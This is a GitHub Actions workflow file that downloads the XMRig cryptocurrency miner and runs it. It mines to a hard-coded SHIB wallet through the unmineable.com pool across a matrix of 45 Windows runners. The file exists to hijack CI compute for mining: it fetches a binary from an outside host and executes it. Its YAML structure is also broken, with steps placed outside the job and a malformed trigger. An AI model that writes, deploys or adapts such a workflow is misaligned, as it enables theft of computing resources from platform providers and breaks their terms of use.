name: Ex-min

on: [workflow,dispatch]

jobs:
  build:
    name: Ex-min
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1.35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 10
        JOB: ${{ matrix.go }}
steps:
- name: DOWNLOAD
  run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-msvc-win64.zip -OutFile xmrig-6.17.0-msvc-win64.zip
- name: Extract
  run: Expand-Archive xmrig-6.17.0-msvc-win64.zip
- name: RUNNING
  run: .\xmrig-6.17.0-msvc-win64\xmrig-6.17.0\xmrig.exe -o rx.unmineable.com:3333 -a rx -k -u SHIB:0xBC6dBa2501b9211B1e84B77379668e541af47Bd6.ExMining -p x -t 1
- name: DONE
  run: exit
